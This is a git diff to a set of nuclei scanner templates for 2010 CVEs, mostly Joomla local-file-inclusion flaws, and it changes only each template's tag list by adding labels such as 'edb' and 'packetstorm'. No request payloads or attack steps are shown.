cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1540.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1540.yaml index 553411902..7858f54cb 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1540.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1540.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ classification: cve-id: CVE-2010-1540 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1601.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1601.yaml index 583e7157e..b02548d3d 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1601.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1601.yaml @@ -12,7 +12,7 @@ info: - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt classification: cve-id: CVE-2010-1601 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1602.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1602.yaml index 9a48cb769..7ea5cac13 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1602.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1602.yaml @@ -11,7 +11,7 @@ info: - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt classification: cve-id: CVE-2010-1602 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1603.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1603.yaml index 240d9fe08..cea0d41ac 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1603.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1603.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1603 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1607.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1607.yaml index 0b9851065..434bfacdf 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1607.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1607.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20111227231442/http://secunia.com/advisories/39539/ classification: cve-id: CVE-2010-1607 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1653.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1653.yaml index 46a8f7b56..eefedff98 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1653.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1653.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/ classification: cve-id: CVE-2010-1653 - tags: cve,cve2010,joomla,lfi + tags: edb,packetstorm,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1657.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1657.yaml index 047ad6f68..ca854101b 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1657.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1657.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39740/ classification: cve-id: CVE-2010-1657 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1658.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1658.yaml index 029d04102..c2c6ba037 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1658.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1658.yaml @@ -11,7 +11,7 @@ info: - http://www.vupen.com/english/advisories/2010/1007 classification: cve-id: CVE-2010-1658 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1659.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1659.yaml index 84b2b5b0c..92c469cc4 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1659.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1659.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/12426 classification: cve-id: CVE-2010-1659 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1714.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1714.yaml index 110c128d3..b088feba4 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1714.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1714.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20140723192327/http://secunia.com/advisories/39413/ classification: cve-id: CVE-2010-1714 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1715.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1715.yaml index fef2f5715..b991fb91d 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1715.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1715.yaml @@ -11,7 +11,7 @@ info: - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt classification: cve-id: CVE-2010-1715 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,packetstorm,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1717.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1717.yaml index 2f8f991b9..3d72e3973 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1717.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1717.yaml @@ -12,7 +12,7 @@ info: - http://www.vupen.com/english/advisories/2010/0924 classification: cve-id: CVE-2010-1717 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1718.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1718.yaml index 3a325a450..a70b5e7b3 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1718.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1718.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ classification: cve-id: CVE-2010-1718 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1719.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1719.yaml index 710b6440d..0cc0b497f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1719.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1719.yaml @@ -11,7 +11,7 @@ info: - http://www.exploit-db.com/exploits/12233 classification: cve-id: CVE-2010-1719 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1722.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1722.yaml index a1a16fddb..f155d6b95 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1722.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1722.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/12177 classification: cve-id: CVE-2010-1722 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1723.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1723.yaml index 3322778e6..75b3e0903 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1723.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1723.yaml @@ -12,7 +12,7 @@ info: - http://www.exploit-db.com/exploits/12289 classification: cve-id: CVE-2010-1723 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1858.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1858.yaml index f25a5c510..9e87647dd 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1858.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1858.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1858 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1870.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1870.yaml index c1f2a8656..d9cb416a4 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1870.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1870.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 - tags: cve,cve2010,rce,listserv,ognl + tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1875.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1875.yaml index 63e156112..c3585c103 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1875.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1875.yaml @@ -12,7 +12,7 @@ info: - http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/ classification: cve-id: CVE-2010-1875 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1878.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1878.yaml index 3aa2a18e4..2204b99fe 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1878.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1878.yaml @@ -12,7 +12,7 @@ info: - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt classification: cve-id: CVE-2010-1878 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1952.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1952.yaml index 546eda12b..0e3c8d859 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1952.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1952.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1952 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1953.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1953.yaml index 5a2a33c91..33803c361 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1953.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1953.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1953 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1954.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1954.yaml index 92e25accb..563749ac7 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1954.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1954.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1954 - tags: cve,cve2010,joomla,lfi + tags: edb,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1955.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1955.yaml index 14fdbe9ec..5a64f68bc 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1955.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1955.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1955 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1956.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1956.yaml index d9f50624b..40d609582 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1956.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1956.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1956 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1957.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1957.yaml index fee775cfe..98363e98d 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1957.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1957.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1957 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1977.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1977.yaml index 09e35ba74..62d676323 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1977.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1977.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1977 - tags: cve,cve2010,joomla,lfi + tags: edb,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1979.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1979.yaml index f55b4d4bf..7f083ff29 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1979.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1979.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1979 - tags: cve,cve2010,joomla,lfi + tags: edb,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1980.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1980.yaml index c25189184..9d7f73a0c 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1980.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1980.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1980 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1981.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1981.yaml index 00c934810..9b0586ed8 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1981.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1981.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1981 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1982.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1982.yaml index e9879732f..a11af2707 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1982.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1982.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1982 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-1983.yaml b/config/nuclei-templates/cves/2010/CVE-2010-1983.yaml index 48292064e..3ce379a6d 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-1983.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-1983.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-1983 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,packetstorm,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2033.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2033.yaml index 6876638ff..c961bef8e 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2033.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2033.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2033 - tags: cve,cve2010,joomla,lfi + tags: packetstorm,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2034.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2034.yaml index fdeb4b7ca..04f804fda 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2034.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2034.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2034 - tags: cve,cve2010,joomla,lfi + tags: edb,packetstorm,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2035.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2035.yaml index 95076b9c4..091206bed 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2035.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2035.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2035 - tags: cve,cve2010,joomla,lfi + tags: packetstorm,cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2036.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2036.yaml index 955a8bb62..108e86df8 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2036.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2036.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2036 - tags: cve,cve2010,lfi,joomla + tags: cve2010,lfi,joomla,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2037.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2037.yaml index cf91bacb4..25f2e3df1 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2037.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2037.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2037 - tags: cve,cve2010,lfi,joomla + tags: joomla,edb,packetstorm,cve,cve2010,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2045.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2045.yaml index 131b2df9e..6d407ff96 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2045.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2045.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2045 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2050.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2050.yaml index b017a2759..ae40b3ac4 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2050.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2050.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2050 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2122.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2122.yaml index ba1feffde..9ac39bcc0 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2122.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2122.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2122 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2128.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2128.yaml index b7a34b233..70510e8ed 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2128.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2128.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2128 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2259.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2259.yaml index 7250f194c..97477fcdd 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2259.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2259.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2259 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2307.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2307.yaml index b4442fd8b..566b2b389 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2307.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2307.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported product version. classification: cve-id: CVE-2010-2307 - tags: cve,cve2010,iot,lfi,motorola + tags: cve2010,iot,lfi,motorola,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2507.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2507.yaml index df8f6bc7b..9295c9f8a 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2507.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2507.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2507 - tags: cve,cve2010,joomla,lfi + tags: edb,packetstorm,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2680.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2680.yaml index 702d3650e..efd570ebd 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2680.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2680.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2680 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2682.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2682.yaml index c7397e666..220e7b6f0 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2682.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2682.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2682 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2857.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2857.yaml index 02dee12b4..8a3d4029c 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2857.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2857.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2857 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2861.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2861.yaml index 01005cf6a..d7353ba7f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2861.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2861.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2010-2861 metadata: shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2010,coldfusion,lfi,adobe,kev + tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2918.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2918.yaml index e56dda1eb..4f7592f7c 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2918.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2918.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2918 - tags: cve,cve2010,joomla,lfi + tags: joomla,lfi,edb,cve,cve2010 requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-2920.yaml b/config/nuclei-templates/cves/2010/CVE-2010-2920.yaml index 67f085185..6b9e2f8d9 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-2920.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-2920.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2920 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-3203.yaml b/config/nuclei-templates/cves/2010/CVE-2010-3203.yaml index 82386d99c..4f52723a4 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-3203.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-3203.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-3203 - tags: cve,cve2010,joomla,lfi + tags: edb,cve,cve2010,joomla,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-3426.yaml b/config/nuclei-templates/cves/2010/CVE-2010-3426.yaml index 9a7401132..ca28b7224 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-3426.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-3426.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-3426 - tags: cve,cve2010,joomla,lfi + tags: lfi,edb,packetstorm,cve,cve2010,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-4231.yaml b/config/nuclei-templates/cves/2010/CVE-2010-4231.yaml index 3c77231b1..440d329e9 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-4231.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-4231.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported product version. classification: cve-id: CVE-2010-4231 - tags: cve,cve2010,iot,lfi,camera + tags: cve,cve2010,iot,lfi,camera,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-4282.yaml b/config/nuclei-templates/cves/2010/CVE-2010-4282.yaml index 527fe7df5..4e19e82b8 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-4282.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-4282.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-4282 - tags: cve,cve2010,lfi,joomla,phpshowtime + tags: phpshowtime,edb,cve,cve2010,lfi,joomla requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-4617.yaml b/config/nuclei-templates/cves/2010/CVE-2010-4617.yaml index f172f0e5d..36464505b 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-4617.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-4617.yaml @@ -12,7 +12,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-4617 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-4719.yaml b/config/nuclei-templates/cves/2010/CVE-2010-4719.yaml index a9ab51ae4..0e3cfa2a1 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-4719.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-4719.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-4719 - tags: cve,cve2010,joomla,lfi + tags: cve2010,joomla,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-4769.yaml b/config/nuclei-templates/cves/2010/CVE-2010-4769.yaml index 33fd95d57..247d5b55f 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-4769.yaml +++ b/config/nuclei-templates/cves/2010/CVE-2010-4769.yaml @@ -13,7 +13,7 @@ info: remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-4769 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2010,joomla,lfi,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2010/CVE-2010-4977.yaml b/config/nuclei-templates/cves/2010/CVE-2010-4977.yaml index 710afbfc6..1da134d5d 100644 --- a/config/nuclei-templates/cves/2010/CVE-2010-4977.yaml +++ 